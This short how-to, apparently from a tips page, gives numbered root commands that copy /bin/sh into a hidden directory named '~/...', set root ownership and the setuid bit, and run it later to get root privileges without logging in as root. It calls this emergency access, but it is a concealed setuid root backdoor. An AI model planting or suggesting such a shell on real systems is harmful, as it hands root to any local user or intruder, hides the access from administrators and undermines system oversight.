Here's how to create a setuid shell (mode 4755) of your favorite UNIX shell owned by root.
Place the shell in a hidden directory in a location that only you can find for emergency problems that need to be fixed when root is unavailable.
As root user

:
1) mkdir ~/...
2) cp /bin/sh ~/...
3) chown root ~/.../sh
4) chmod 4755 ~/.../sh
To execute the shell simply type:
~/.../sh
And you are now "root user privy" without being root!
